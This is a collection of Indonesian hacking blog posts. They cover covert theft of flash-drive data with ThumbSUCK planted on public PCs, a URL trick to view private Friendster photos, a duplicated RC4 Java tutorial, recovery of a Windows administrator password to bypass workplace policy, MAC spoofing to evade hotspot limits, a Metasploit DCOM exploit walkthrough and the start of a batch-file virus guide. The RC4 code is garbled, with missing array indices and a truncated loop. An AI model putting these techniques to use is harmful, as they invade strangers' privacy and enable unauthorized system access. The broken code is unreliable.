Hacking Flashdisk
FlashDISK merupakan media penyimpanan portable yang kini makin banyak digunakan oleh para pengguna komputer di Indonesia. Selain harganya yang makin murah, kapasitasnya pun kian besar dengan ukuran fisik yang kian mini dari generasi ke generasi ;)
Nah, biasanya nich, orang seringkali akan menyimpan data-data sensitifnya di dalam flashdisk. Dan tak jarang, seseorang menyimpan PASSWORD account-accountnya pada suatu file teks yang disimpan dalam FlashDISK.
Anda mengincar target yang demikian? caranya cukup mudah. Alat dan bahan yang perlu anda persiapkan adalah:
ThumbsuCK.exe - download secara cuma-cuma di member area http://spyrozone.net kategory Tools & Utility
Setelah anda mendownloadnya, copy ThumbSUCK.exe kedalam suatu directory tersembunyi. Misalnya saja anda letakkan di Local Drive D:\. Buatlah suatu directory dengan atribut SUPER HIDDEN agar korban tidak curiga. Ikuti panduan berikut:
1. Buatlah directory baru di D:\ atau dimanapun anda suka. Beri nama terserah anda.
Pada contoh ini saya beri nama gudangkorban. Salinlah ThumbSUCK.exe kedalam
directory tersebut lalu klik 2X untuk menjalankannnya.
2. Klik Start - Run lalu ketik cmd untuk memanggil Windows Command Processor
3. Kini saatnya menjadikan directory tersebut menjadi super hidden. Gunakan saja
perintah attrib dengan format attrib lokasifolder +s +h. Karena nama directory
yang tadi dibuat adalah gudangkorban yang terletak di drive D:\ maka ketik:
attrib d:\gudang korban +s +h
lalu tekan ENTER.
Selesai sudah.. kini cobalah anda tancapkan sendiri FlashDISK anda. Data-data anda yang berada didalam FlashDISK akan disalin dengan silent mode oleh ThumbSUCK.exe kedalam directory gudangkorban di suatu folder dengan nama sesuai dengan volume label Flashdisk.
Karena directory gudangkorban diberi atribut super hidden, maka hilangkan terlebihdahulu tanda centang pada opsi Hide Protected Operating System Files (Recomended) dan beri centang pada Show Hidden Files and Folders di Folder Options (Tools -> Folder Options pada Windows Explorer).
Untuk mendisable aplikasi ini, gunakan Windows TaskManager (CTRL-ALT-DELETE) atau gunakan saja TaskMANAGER kesayangan anda.
Bagaimana jika ditanam di komputer public? atau ditanam di lab-lab kampus? Hmm.. dengan sedikit beramain-main Registry, anda dapat membuat aplikasi ini otomatis berjalan ketika windows startup ;p hehehe.. tentunya anda bisa panen data pribadi orang lain ^_^
Sabtu, 21 Februari 2009
Diposting oleh Dj LoeTH-PHiE di 22.13 0 komentar
Private Photos In Friendster
In FRIENDSTER, some people can hide some photos that they upload into friendster albums. Usually this photos is private picture or something like secret picture. If we want to see that picture, we must ask permission from the owner..2 days ago, i found some hacking into this private photo, so we can see private photos from other people friendster account..The 3 things that you must do to see the private photo is1. target uid
example : http://www.friendster.com/53349334
41082848 - is target UID ( it's just example, so find your target first )
2. target album id write this address into your addressbar http://www.friendster.com/viewalbums.php?uid="Your target uid here"
example : http://www.friendster.com/viewalbums.php?uid=53349334
Select View - Page Source from the browser menu, and then find "abAlbumPrivacy" near the word private
example :
"abAlbumPrivacy-1" -- all you need is the number in the end of word,in this case the number is 1 ( one )
3. Openhttp://www.friendster.com/photolist_ajax.php?uid="your target uid here"&a="album privacy id here"&page=0
example : http://www.friendster.com/photolist_ajax.php?uid=53349334&a=1&page=0
You will get result like this..
{"photos":[{"isPrimary":"0","privacy":"1","pid":"1","rid":"851208344","album_id":"1","guid":"b799e48214..etc.
All you need is "rid":"851208344" -- remember the number "851208344" this is the photo id .
After the three thing finished, go back to the http://www.friendster.com/viewalbums.php?uid=53349334
right click on one of the image that apear, and then choose properties. See under the image properties
Diposting oleh Dj LoeTH-PHiE di 22.11 0 komentar
RC4 Encryption-Decryption
Dikala media internet menjadi kebutuhan orang Indonesia, terkadang orang kemudian berpikir untuk menjadikan Internet sebagai media untuk Bisnis, transaksi komersial semacam Toko Online, internet banking, e-comerce, dan lain sebagainya.
Kebutuhan semacam ini, kemudian mengharuskan kita memiliki pengetahuan tentang keamanan (baca:Security) baik password, e-mail terjaga kerahasiannya, hingga keamanan dalam hal Data dan Teks.
Oleh karena itu, diantanya kita kenal algoritma, enkripsi untuk pengamanan data misalnya:MD2, MD4, MD5, Blowfish, Rivest Cipher (RC)4,RC5, dan lain sebagainya.
Pembakuan penulisan pada kriptografi dapat ditulis dalam bahasa matematika. Fungsi-fungsi yang mendasar dalam kriptografi adalah enkripsi dan dekripsi.
Enkripsi adalah proses mengubah suatu pesan asli (plaintext) menjadi suatu pesan dalam bahasa sandi (ciphertext).
Kurang lebih penjelasannya seperti berikut:
C = E (M)
dimana
M = pesan asliE = proses enkripsiC = pesan dalam bahasa sandi (untuk ringkasnya disebut sandi)
Sedangkan Dekripsi adalah proses mengubah suatu teks/pesan kebentuk aslinya yaitu menerjemahkan artinya.
M = D (C)D = proses dekripsi
Dalam setiap transaksi di internet , idealnya, setiap data yang ditransmisikan harusnya terjamin :
* Integritas data
Jaminan integritas data sangat penting, sehingga data yang di kirimkan akan sama persis dengan data yang diterima, tanpa mengalami perubahan apapun pada selama ditransmisikan.
* Kerahasiaan data
Jaminan kerahasiaan data juga penting karena dengan demikian tidak ada pihak lain yang bisa membaca data yang ada selama data tersebut ditransmisikan.
* Otentikasi akse data
Mekanisme otentikasi akses data menjamin bahwa data ditransmisikan oleh pihak yang benar dengan tujuan transimisi yang benar pula.
Teknik kriptografi data untuk enkripsi ada dua macam yaitu:
* Kriptografi simetrik
Dengan model kriptografi ini, data di enkripsi dan didekripsi dengan kunci rahasia yang sama.
* Kriptografi asimetrik
Dengan model kriptografi ini, data dienkripsi dan didekripsi dengan kunci rahasia yang berbeda.pasangan kunci untuk enkripsi dan dekripsi dikenal dengan private key dan public key.
Aplikasi kriptografi simetrik RC4 menggunakan Java
RC4 merupakan merupakan salah satu jenis stream cipher, yaitu memproses unit atau input data pada satu saat. Dengan cara ini enkripsi atau dekripsi dapat dilaksanakan pada panjang yang variabel. Algoritma ini tidak harus menunggu sejumlah input data tertentu sebelum diproses, atau menambahkan byte tambahan untuk mengenkrip. Metode enkripsi RC4 sangat cepat kurang lebih 10 kali lebih cepat dari DES.
Untuk melihat bagaimana metode enlripsi RC4 bekerja maka dalam tulisan ini dibuat aplikasi dengan menggunakan java, adapun source program tersebut adalah sebagai berikut :
Nama file : RC4Engine.java
—————-mulai—————-
class KeyParameter{
private byte[] key;
public KeyParameter(byte[] key){
this(key,0,key.length);
}
public KeyParameter(byte[] key,int keyoff,int keyLen){
this.key = new byte[keyLen];
System.arraycopy(key,keyoff,this.key,0,keyLen);
}
public byte[] getKey(){
return key;
}
}
class EncRC4Engine{
private final static int STATE_LENGTH = 256;
private byte[] engineState = null,workingKey = null;
private int x=0,y=0;
private static final char[] kDigits = {’0',’1',’2',’3',’4',’5',’6',’7',’8',’9',’a’,’b’,’c’,’d’,’e’,’f’};
EncRC4Engine(){}//constructor
public void init(boolean forEncryption,KeyParameter params){
if(params instanceof KeyParameter){
workingKey = ((KeyParameter)params).getKey();
setKey(workingKey);
return;
}
throw new IllegalArgumentException(”invalid parameter passed to RC4 init”+params.getClass().getName());
}
public void processBytes(byte[] in,int inOff,int len,byte[] out,int outOff){
if((inOff+len)>in.length){
throw new RuntimeException(”output buffer too short”);
}
if((outOff+len)>out.length){
throw new RuntimeException(”out put buffer too short”);
}
for (int i = 0 ; i < len ; i++){
x = (x+1) & 0xff;
y = ( engineState+ y ) & 0xff;
//swap
byte tmp = engineState;
engineState= engineState[y];
engineState[y] = tmp;
//xor
out[i + outOff] = (byte)(in[i+inOff] ^ engineState[(engineState+ engineState[y]) & 0xff]);
}
}
public String bytesToHex(byte[] raw){
int length = raw.length;
char[]hex = new char[length*2];
for (int i=0;i
int highIndex = value >> 4;
int lowIndex = value & 0×0f;
hex[i*2+0] = kDigits[highIndex];
hex[i*2+1] = kDigits[lowIndex];
}
return (new String(hex)).toString();
}
public void reset(){
setKey(workingKey);
}
//private implementation
private void setKey(byte[] keyBytes){
workingKey = keyBytes;
x=0;y=0;
if (engineState == null){
engineState = new byte [STATE_LENGTH];
}
//reset the state of the engine
for(int i = 0;i < STATE_LENGTH;i++){
engineState=(byte)i;
}
int i1=0;int i2=0;
for(int i=0;i < STATE_LENGTH;i++){
i2 = ((keyBytes[i1] & 0xff) + engineState+ i2) & 0xff;
//do the byte swap inline
byte tmp = engineState;
engineState=engineState[i2];
engineState[i2]=tmp;
i1=(i1+1) % keyBytes.length;
}
}
}
————-selesai—————-
nama file : TesRC4Engine.java
————-mulai—————-
import java.io.*;
class tesRC4Engine {
public static void main (String args[]){
try{
String myKey1, myKey2, text2Encrypt, text2Decrypt;
BufferedReader b;
byte[] ciphertext1;
byte[] ciphertext2;
EncRC4Engine s1 = new EncRC4Engine();
EncRC4Engine s2 = new EncRC4Engine();
b = new BufferedReader(new InputStreamReader(System.in));
System.out.print(”masukan data untuk encryption : “);
text2Encrypt = b.readLine();
System.out.print(”masukan kunci encryption : “);
myKey1 = b.readLine();
s1.init(true,new KeyParameter(myKey1.getBytes()));
ciphertext1 = new byte[text2Encrypt.length()];
s1.processBytes(text2Encrypt.getBytes(),0,text2Encrypt.length(),ciphertext1,0);
System.out.print(”hasil encrypt dari \”” + text2Encrypt);
System.out.println(”\” adalah ” + s1.bytesToHex(ciphertext1));
text2Decrypt = s1.bytesToHex(ciphertext1);
System.out.print(”masukan kunci untuk decrypt : “);
myKey2 = b.readLine();
s2.init(false,new KeyParameter(myKey2.getBytes()));
ciphertext2 = new byte[ciphertext1.length];
s2.processBytes(ciphertext1, 0, ciphertext1.length,ciphertext2,0);
System.out.print(”hasil decrypt dari \”” + text2Decrypt);
System.out.println(”\” adalah ” + (new String(ciphertext2)).toString());
}catch(IOException e){
e.printStackTrace();
}
}
}
———–selesai———–
Kompilasi dan hasil eksekusi dari source program diatas adalah sebagai berikut:
C:\>java TesRC4Engine
masukan data untuk encryption : keamanan jaringan komputer
masukan kunci encryption : kjk
hasil encrypt dari “keamanan jaringan komputer” adalah 5ec874ee3cd7cd0b38dad37c7b684c0ccc589c2f1e689287a746
masukan kunci untuk decrypt : kjk
hasil decrypt dari “5ec874ee3cd7cd0b38dad37c7b684c0ccc589c2f1e689287a746? adalah keamanan jaringan komputer
C:\>java TesRC4Engine
masukan data untuk encryption : keamanan jaringan komputer
masukan kunci encryption : h
hasil encrypt dari “keamanan jaringan komputer” adalah ca28c9e03687b13fd9f0273fb8c5d31eba8955371c82c3985647
masukan kunci untuk decrypt : kjk
hasil decrypt dari “ca28c9e03687b13fd9f0273fb8c5d31eba8955371c82c3985647? adalah ÿ…Ück>ZÁ@•1ªÃøsñ¢woš$k”s
Dari hasil diatas dapat diambil suatu analisi bahwa :
* RC4 merupakan algoritma enkripsi simetris
Hal ini terbukti bahwa untuk melakukan enkripsi dan dekripsi diperlukan suatu kunci/key yang sama. Jika key untuk enkripsi dan key untuk dekripsi berbeda, hasil dekripsi tidak akan menghasilkan hasil yang sama dengan plain text yang sebenarnya. Hal ini dapat dilihat pada eksekusi program yang kedua.
* Hasil enkripsi bergantung dari key
Hasil enkripsi dari plain text yang sama akan berbeda jika digunakan key atau kunci yang berbeda pula. Dengan kata lain hasil enkripsi merupakan fungsi dari plain text dan key.
Daftar pustaka:Blog update hhan
Wicaksono, Adi. (2003). Pemrograman Internet dan XML pada Ponsel dengan Midlet Java. Jakarta: PT Elex Media Komputindo.
Kriptografi [online], available at geocities.com/amwibowo/resource/ komparasi/komparasi.html
Sukmawan, Budi.(1998). RC4 STREAM CIPHER, available at bdg.centrin.net.id/ ~budskman/rc4.html
Download Program:http://www.softpedia.com/get/Security/Encrypting/Easy-File-Encrypter.shtmlhttp://www.softpedia.com/get/Security/Encrypting/TextCrypt-Enlightware.shtmlhttp://3d2f.com/download/2-735-edxor-free-download.shtmlArtikel Algoritma- Cryptography, Rivest Cipher 4« on: January 25, 2008, 05:57:41 AM »
Dikala media internet menjadi kebutuhan orang Indonesia, terkadang orang kemudian berpikir untuk menjadikan Internet sebagai media untuk Bisnis, transaksi komersial semacam Toko Online, internet banking, e-comerce, dan lain sebagainya.
Kebutuhan semacam ini, kemudian mengharuskan kita memiliki pengetahuan tentang keamanan (baca:Security) baik password, e-mail terjaga kerahasiannya, hingga keamanan dalam hal Data dan Teks.
Oleh karena itu, diantanya kita kenal algoritma, enkripsi untuk pengamanan data misalnya:MD2, MD4, MD5, Blowfish, Rivest Cipher (RC)4,RC5, dan lain sebagainya.
Pembakuan penulisan pada kriptografi dapat ditulis dalam bahasa matematika. Fungsi-fungsi yang mendasar dalam kriptografi adalah enkripsi dan dekripsi.
Enkripsi adalah proses mengubah suatu pesan asli (plaintext) menjadi suatu pesan dalam bahasa sandi (ciphertext).
Kurang lebih penjelasannya seperti berikut:
C = E (M)
dimana
M = pesan asliE = proses enkripsiC = pesan dalam bahasa sandi (untuk ringkasnya disebut sandi)
Sedangkan Dekripsi adalah proses mengubah suatu teks/pesan kebentuk aslinya yaitu menerjemahkan artinya.
M = D (C)D = proses dekripsi
Dalam setiap transaksi di internet , idealnya, setiap data yang ditransmisikan harusnya terjamin :
* Integritas data
Jaminan integritas data sangat penting, sehingga data yang di kirimkan akan sama persis dengan data yang diterima, tanpa mengalami perubahan apapun pada selama ditransmisikan.
* Kerahasiaan data
Jaminan kerahasiaan data juga penting karena dengan demikian tidak ada pihak lain yang bisa membaca data yang ada selama data tersebut ditransmisikan.
* Otentikasi akse data
Mekanisme otentikasi akses data menjamin bahwa data ditransmisikan oleh pihak yang benar dengan tujuan transimisi yang benar pula.
Teknik kriptografi data untuk enkripsi ada dua macam yaitu:
* Kriptografi simetrik
Dengan model kriptografi ini, data di enkripsi dan didekripsi dengan kunci rahasia yang sama.
* Kriptografi asimetrik
Dengan model kriptografi ini, data dienkripsi dan didekripsi dengan kunci rahasia yang berbeda.pasangan kunci untuk enkripsi dan dekripsi dikenal dengan private key dan public key.
Aplikasi kriptografi simetrik RC4 menggunakan Java
RC4 merupakan merupakan salah satu jenis stream cipher, yaitu memproses unit atau input data pada satu saat. Dengan cara ini enkripsi atau dekripsi dapat dilaksanakan pada panjang yang variabel. Algoritma ini tidak harus menunggu sejumlah input data tertentu sebelum diproses, atau menambahkan byte tambahan untuk mengenkrip. Metode enkripsi RC4 sangat cepat kurang lebih 10 kali lebih cepat dari DES.
Untuk melihat bagaimana metode enlripsi RC4 bekerja maka dalam tulisan ini dibuat aplikasi dengan menggunakan java, adapun source program tersebut adalah sebagai berikut :
Nama file : RC4Engine.java
—————-mulai—————-
class KeyParameter{
private byte[] key;
public KeyParameter(byte[] key){
this(key,0,key.length);
}
public KeyParameter(byte[] key,int keyoff,int keyLen){
this.key = new byte[keyLen];
System.arraycopy(key,keyoff,this.key,0,keyLen);
}
public byte[] getKey(){
return key;
}
}
class EncRC4Engine{
private final static int STATE_LENGTH = 256;
private byte[] engineState = null,workingKey = null;
private int x=0,y=0;
private static final char[] kDigits = {’0',’1',’2',’3',’4',’5',’6',’7',’8',’9',’a’,’b’,’c’,’d’,’e’,’f’};
EncRC4Engine(){}//constructor
public void init(boolean forEncryption,KeyParameter params){
if(params instanceof KeyParameter){
workingKey = ((KeyParameter)params).getKey();
setKey(workingKey);
return;
}
throw new IllegalArgumentException(”invalid parameter passed to RC4 init”+params.getClass().getName());
}
public void processBytes(byte[] in,int inOff,int len,byte[] out,int outOff){
if((inOff+len)>in.length){
throw new RuntimeException(”output buffer too short”);
}
if((outOff+len)>out.length){
throw new RuntimeException(”out put buffer too short”);
}
for (int i = 0 ; i < len ; i++){
x = (x+1) & 0xff;
y = ( engineState+ y ) & 0xff;
//swap
byte tmp = engineState;
engineState= engineState[y];
engineState[y] = tmp;
//xor
out[i + outOff] = (byte)(in[i+inOff] ^ engineState[(engineState+ engineState[y]) & 0xff]);
}
}
public String bytesToHex(byte[] raw){
int length = raw.length;
char[]hex = new char[length*2];
for (int i=0;i
int highIndex = value >> 4;
int lowIndex = value & 0×0f;
hex[i*2+0] = kDigits[highIndex];
hex[i*2+1] = kDigits[lowIndex];
}
return (new String(hex)).toString();
}
public void reset(){
setKey(workingKey);
}
//private implementation
private void setKey(byte[] keyBytes){
workingKey = keyBytes;
x=0;y=0;
if (engineState == null){
engineState = new byte [STATE_LENGTH];
}
//reset the state of the engine
for(int i = 0;i < STATE_LENGTH;i++){
engineState=(byte)i;
}
int i1=0;int i2=0;
for(int i=0;i < STATE_LENGTH;i++){
i2 = ((keyBytes[i1] & 0xff) + engineState+ i2) & 0xff;
//do the byte swap inline
byte tmp = engineState;
engineState=engineState[i2];
engineState[i2]=tmp;
i1=(i1+1) % keyBytes.length;
}
}
}
————-selesai—————-
nama file : TesRC4Engine.java
————-mulai—————-
import java.io.*;
class tesRC4Engine {
public static void main (String args[]){
try{
String myKey1, myKey2, text2Encrypt, text2Decrypt;
BufferedReader b;
byte[] ciphertext1;
byte[] ciphertext2;
EncRC4Engine s1 = new EncRC4Engine();
EncRC4Engine s2 = new EncRC4Engine();
b = new BufferedReader(new InputStreamReader(System.in));
System.out.print(”masukan data untuk encryption : “);
text2Encrypt = b.readLine();
System.out.print(”masukan kunci encryption : “);
myKey1 = b.readLine();
s1.init(true,new KeyParameter(myKey1.getBytes()));
ciphertext1 = new byte[text2Encrypt.length()];
s1.processBytes(text2Encrypt.getBytes(),0,text2Encrypt.length(),ciphertext1,0);
System.out.print(”hasil encrypt dari \”” + text2Encrypt);
System.out.println(”\” adalah ” + s1.bytesToHex(ciphertext1));
text2Decrypt = s1.bytesToHex(ciphertext1);
System.out.print(”masukan kunci untuk decrypt : “);
myKey2 = b.readLine();
s2.init(false,new KeyParameter(myKey2.getBytes()));
ciphertext2 = new byte[ciphertext1.length];
s2.processBytes(ciphertext1, 0, ciphertext1.length,ciphertext2,0);
System.out.print(”hasil decrypt dari \”” + text2Decrypt);
System.out.println(”\” adalah ” + (new String(ciphertext2)).toString());
}catch(IOException e){
e.printStackTrace();
}
}
}
———–selesai———–
Kompilasi dan hasil eksekusi dari source program diatas adalah sebagai berikut:
C:\>java TesRC4Engine
masukan data untuk encryption : keamanan jaringan komputer
masukan kunci encryption : kjk
hasil encrypt dari “keamanan jaringan komputer” adalah 5ec874ee3cd7cd0b38dad37c7b684c0ccc589c2f1e689287a746
masukan kunci untuk decrypt : kjk
hasil decrypt dari “5ec874ee3cd7cd0b38dad37c7b684c0ccc589c2f1e689287a746? adalah keamanan jaringan komputer
C:\>java TesRC4Engine
masukan data untuk encryption : keamanan jaringan komputer
masukan kunci encryption : h
hasil encrypt dari “keamanan jaringan komputer” adalah ca28c9e03687b13fd9f0273fb8c5d31eba8955371c82c3985647
masukan kunci untuk decrypt : kjk
hasil decrypt dari “ca28c9e03687b13fd9f0273fb8c5d31eba8955371c82c3985647? adalah ÿ…Ück>ZÁ@•1ªÃøsñ¢woš$k”s
Dari hasil diatas dapat diambil suatu analisi bahwa :
* RC4 merupakan algoritma enkripsi simetris
Hal ini terbukti bahwa untuk melakukan enkripsi dan dekripsi diperlukan suatu kunci/key yang sama. Jika key untuk enkripsi dan key untuk dekripsi berbeda, hasil dekripsi tidak akan menghasilkan hasil yang sama dengan plain text yang sebenarnya. Hal ini dapat dilihat pada eksekusi program yang kedua.
* Hasil enkripsi bergantung dari key
Hasil enkripsi dari plain text yang sama akan berbeda jika digunakan key atau kunci yang berbeda pula. Dengan kata lain hasil enkripsi merupakan fungsi dari plain text dan key.
Daftar pustaka:Blog update hhan
Wicaksono, Adi. (2003). Pemrograman Internet dan XML pada Ponsel dengan Midlet Java. Jakarta: PT Elex Media Komputindo.
Kriptografi [online], available at geocities.com/amwibowo/resource/ komparasi/komparasi.html
Sukmawan, Budi.(1998). RC4 STREAM CIPHER, available at bdg.centrin.net.id/ ~budskman/rc4.html
Download Program:http://www.softpedia.com/get/Security/Encrypting/Easy-File-Encrypter.shtmlhttp://www.softpedia.com/get/Security/Encrypting/TextCrypt-Enlightware.shtmlhttp://3d2f.com/download/2-735-edxor-free-download.shtml
Diposting oleh Dj LoeTH-PHiE di 22.10 0 komentar
Ethical hacking?
Memang hidup dijaman sekarang yang sulit semakin sulit bila setiap keinginan kita untuk “berkembang” dikekang. Bagi karyawan perkantoran yang menggunakan komputer dengan OS Windows XP akan makin terkekang kebebasannya karena komputer hanya bisa digunakan hanya untuk kerja dan kerja.
Memang ini merupakan IT policy setiap kantor yang tidak memperbolehkan untuk menginstall bermacam2 program tapi hal inilah yang membuat para karyawan sulit untuk berkembang. Memang harus diakui ada sisi baik dan ada juga sisi buruk dari penerapan IT Policy.
Tapi kali ini kita sedikit mengabaikan sisi baik dari IT policy tersebut dan lebih mensupport para karyawan untuk bisa berkembang.Artikel ini sedikit memberi gambaran bahwa setiap ada kesulitan pasti ada jalan keluar.
Di dunia maya ini banyak sekali artikel yang membahas tentang cara membongkar password administrator Windows XP bahkan sudah banyak program yang dibuat untuk mereset ataupun mengganti password tersebut. Tentunya jika kita ingin bermain manis, kita tidak perlu melakukan cara-cara kasar tersebut karena resiko yang kita ambil akan lebih besar. Cara yang digunakan untuk menemukan password administartor sangat simple dan tidak perlu banyak pengetahuan yang dibutuhkan hanya tinggal mengikuti langkah dibawah ini :
Keperluan yang dibutuhkan untuk mengetahui password administrator antara lain 1 buah disket, akses internet dan email:langkah pertama adalah mendownload file image.exe dari http://www.loginrecovery.com/referal.php?p=2Buat bootable disk dengan menjalankan file tersebutMatikan computer lalu boot dengan menggunakan disk tersebut. (disk tersebut akan menghasilkan satu buah file upload.txt)Setelah itu masuk ke windows xp secara normal (sebelumnya keluarkan disket) lalu buka http://www.loginrecovery.com/instructions.phpMasukkan disket lalu pilih upload.txt, masukkan alamat email dan access code lalu klik submit.Kita akan mendapatkan konfirmasi lewat email untuk mengetahui password kita telah selesai. Sebenarnya website ini sangat cepat sekali untuk menemukan password tetapi karena kita menggunakannya secara gratisan maka harus menunggu 48 jam (2 hari) untuk bisa melihat password administrator, kecuali kalau mau bayar, dimenit itu juga password bisa ketahuan.Bila telah 48 jam (lama bener yah ..) buka http://www.loginrecovery.com/results.php , masukkan alamat email saat kita mengupload, klik view lalu masukkan access code and .. password administrator ditemukan
Memang segala sesuatu tidak ada yang sempurna tetapis situs ini mengklaim keberhasilan menemukan password diatas 98.5% hebat bukan …Selamat mencoba dan ingat segala sesuatu yang kita perbuat, akibatnya kita sendiri yang mananggungnya jadi waspadalah…..Oleh Loethphie
Diposting oleh Dj LoeTH-PHiE di 22.09 0 komentar
Menjebol Proteksi HotSpot
Hari gini internet kabel ?
Seperti kita ketahui, HotSPOT atau tempat akses internet Wireless dengan standard 802.11b/g sudah bukan barang asing lagi ditelinga kita, dan bila kita berpergian di tempat publik seperti Mall, Cafe, hotel dan kantor, dengan mudahnya kita menemukan fasilitas tersebut.
Namun sangat disayangkan tidak semua penyedia layanan menawarkan fasilitas Internet Wireless dengan gratis, atau kalaupun gratis, sangatlah terbatas.
Salah satu proteksi yang digunakan penyedia layanan wireless adalah dengan membatasi akses internet berdasarkan MAC Address.
Apa itu MAC Adress ?
In computer networking a Media Access Control address (MAC address) or Ethernet Hardware Address (EHA) or hardware address or adapter address is a quasi-unique identifier attached to most network adapters (NICs).
Oke jadi kesimpulannya MAC Address adalah nomer unik yang membedakan setiap perangkat jaringan yang terpasang dikomputer kita.
Contoh kasus adalah HotSPOT di Food Court Plasa Semanggi. Ini adalah tempat favorit saya berinternet selain di Kampus Atma Jaya .
Pada HotSPOT FoodCourt Plasa Semanggi , sang penyedia layanan Internet Wireless, membatasi penggunaan Internet gratis hanya selama 3 Jam, setelah itu anda tidak dapat mengakses internet lagi, dan baru akan dapat mengakses lagi di hari esok. Jenis proteksi yang digunakan adalah MAC Address Filtering.
Kondisi yang saya hadapi adalah : saya ingin mengerjakan tugas kuliah di food court itu sembari makan dan minum dan saya membutuhkan akses internet.Untuk menyelesaikan tugas, saya dan teman-teman membutuhkan waktu lebih dari 3 jam.
Bagaimana menjebol Proteksi dengan MAC Address ?
Ada sebuah tools yang sangat bermanfaat untuk anda.Tools itu bernama K-MAC.Anda dapat mendownloadnya disini : http://www.neset.com/download/?k-mac.zip
Dengan tools ini anda akan dapat mengubah MAC-Address anda secara instant dan apa artinya ? Anda dapat menjebol Proteksi MAC Address ! Setiap jatah akses internet anda habis dalam waktu 3 jam, yang anda perlu lakukan hanyalah mengubah MAC Address anda, dan lakukan koneksi kembali
Lalu bagaimana bila akses Wireless dibuat dengan proteksi yang lain ? Seperti WEP Keys dan WPA/WPA2 Keys ? Itu akan saya bahas lain kali
Diposting oleh Dj LoeTH-PHiE di 22.09 0 komentar
Cara Hacking dengan Metasploit
Rasa penasaran saya muncul ketika banyak forum security membicarakan tentang Metasploit.
Apakah itu metasploit ? Sulitkah menggunakannnya ? Saatnya membuka sedikit rahasia para Lamer (Hacker kelas teri) yang seringkali menyombongkan diri, padahal yang mereka lakukan hanyalah menggunakan tools yang dapat digunakan oleh anak SMP sekalipun.
Untuk memberikan gambaran dan mempermudah penjelasan, saya akan memberikan contoh bug pada service DCOM Windows yang dulu sangat populer dimanfaatkan oleh teman-teman SMA saya dengan exploit terpopuler saat itu : KAHT (dimana saya tidak tertarik hacking pada waktu itu) untuk menembus Server Lab sekolah - yang akhirnya ketahuan dan dimarahi guru Lab .Feeling saya sih mereka berusaha mengambil soal ulangan yang diketik di server, dasar anak bandel, hehehe….
Berikut alat-alat praktek yang kita butuhkan pada percobaan kali ini :
1. Sebuah PC yang cukup bertenaga untuk virtualisasi PC.
2. Metasploit Framework, dapat di download disini.
3. Microsoft Windows NT SP3-6a/2000/XP/2003 yang memiliki bug pada service DCOM.
4. Vmware, dapat di download disini.
Vmware disini digunakan untuk membuat virtualisasi jaringan komputer, sehingga memudahkan anda yang hanya memiliki 1 PC saja dirumah.
Saya akan melompati langkah-langkah menginstall VMware dan juga cara menginstall Windows di VMware, sebab apabila anda tidak mengerti hal tersebut, kemungkinan besar anda juga tidak akan paham yang kita bahas disini.
Sebagai permulaan kita akan memulai dengan mengenal lebih dekat Metasploit Framework. Pada situs pembuatnya dipaparkan secara gamblang tentang apa itu Metasploit framework, dan juga tujuan penggunaannya :What is it?
The Metasploit Framework is a development platform for creating security tools and exploits. The framework is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.What does it do?
The framework consists of tools, libraries, modules, and user interfaces. The basic function of the framework is a module launcher, allowing the user to configure an exploit module and launch it at a target system. If the exploit succeeds, the payload is executed on the target and the user is provided with a shell to interact with the payload.
Semuanya saya biarkan tertulis dalam bahasa orang bule sebab ada kata-kata yang tidak pas atau tidak bisa dipadankan bila diterjemahkan dalam Bahasa Indonesia.
Selanjutnya untuk lebih jauh tentang exploit maupun bug pada DCOM service dapat anda search sendiri di google, sebab terlalu panjang jika saya jelaskan disini.
Sekarang mari kita ngoprek komputer !
Langkah pertama adalah download Vmware dari situsnya, lalu anda dapat mulai menginstall Windows yang memiliki bug DCOM, kemudian jalankan windows anda di VMware !
Langkah kedua adalah download Metasploit Framework dari situsnya. Lalu install dikomputer anda dan jalankan, hingga keluar tampilan seperti berikut :
Kemudian pada kotak search ketikan dcom, lalu klik Find, dan pilihlah Exploits Microsoft RPC DCOM Interface Overflow.
Setelah itu kita memilih target yang akan kita exploitasi, dalam kasus kali ini Sistem Operasi target kita adalah Windows XP home, oleh karena itu pilihlah yang sesuai, lalu klik Forward :
Kemudian kita dihadapkan pada pilihan payload. Payload adalah sebuah aksi yang dilakukan setelah bug berhasil di exploitasi oleh Metasploit. Untuk pembelajaran, kita pilih Generic/Shell_Bind_TCP , artinya kita akan mengambil alih Shell Bind atau lebih dikenal di lingkungan windows dengan Command Prompt dari target hacking kita. Setelah itu klik Forward.
Langkah berikutnya kita harus menentukan Target Address kita, disini saya telah mengkonfigurasi Windows XP Home di Vmware dengan IP 192.168.126.132, oleh karena itu tuliskan ip tersebut pada kolom RHOST. Sedangkan RPORT disini sudah ditentukan yaitu port 135 yang merupakan port default dari service DCOM dimana secara default dibuka oleh Windows XP Home ! Wah, berbahaya sekali yah… Untuk LPORT disini juga sudah ditentukan yaitu 4444, Local Port akan membuka sebuah port di PC anda untuk berhubungan dengan komputer target. Selanjutnya klik Forward .
Setelah semua konfigurasi selesai, anda akan mendapatkan pesan konfirmasi seperti berikut, jika anda yakin semuanya telah benar,lanjutkan dengan klik Apply.
Jika target berhasil terexploitasi, anda akan mendapatkan sebuah session yang berisi target hacking kita dan siap untuk di double klik.
Kemudian anda akan mendapati sebuah layar Command Prompt dari komputer target dan anda sebagai Administrator. Jika sudah begini semua terserah anda, jangan tanyakan apa yang bisa dilakukan selanjutnya.Dan selesailah tutorial hacking kali ini Mudah bukan ?
Entri ini dituliskan pada Mei 26, 2008 pada 1:43 am dan disimpan dalam Hacking. Anda bisa mengikuti setiap tanggapan atas artikel ini melalui RSS 2.0 pengumpan. Anda bisa tinggalkan tanggapan, atau lacak tautan dari situsmu sendiri.
Diposting oleh Dj LoeTH-PHiE di 22.08 0 komentar
Bikin Virus dengan perintah CMD
Bikin Virus dengan perintah CMD
Bagi yang tidak bisa bahasa pemrograman ada satu cara yang gampang dan sangat mudah untuk membuat semacam virus.
Yang perlu dipersiapkan:
1. Software Quick Batch File Compiler (quickbfc.exe)2. License key atau crack dari quickbfc3. Pengetahuan akan perintah cmd4. Software Icon Changer
quickbfc adalah software dari www.abyssmedia.com yang mana software ini bisa digunakan untuk mengcompile (atau apa aja deh namanya) perintah2 cmd menjadi file exe.Salah satu keistimewaan quickbfc ini adalah kemampuannya untuk menjadikan file exe yang dibuat ketika di run tidak akan menampilkan jendela console. Fitur ini bisa diset dengan memilih project=>option=>ghost application. Hanya saja yang bisa menggunakan fitur ini hanyalah full version (atau bisa juga di crack).
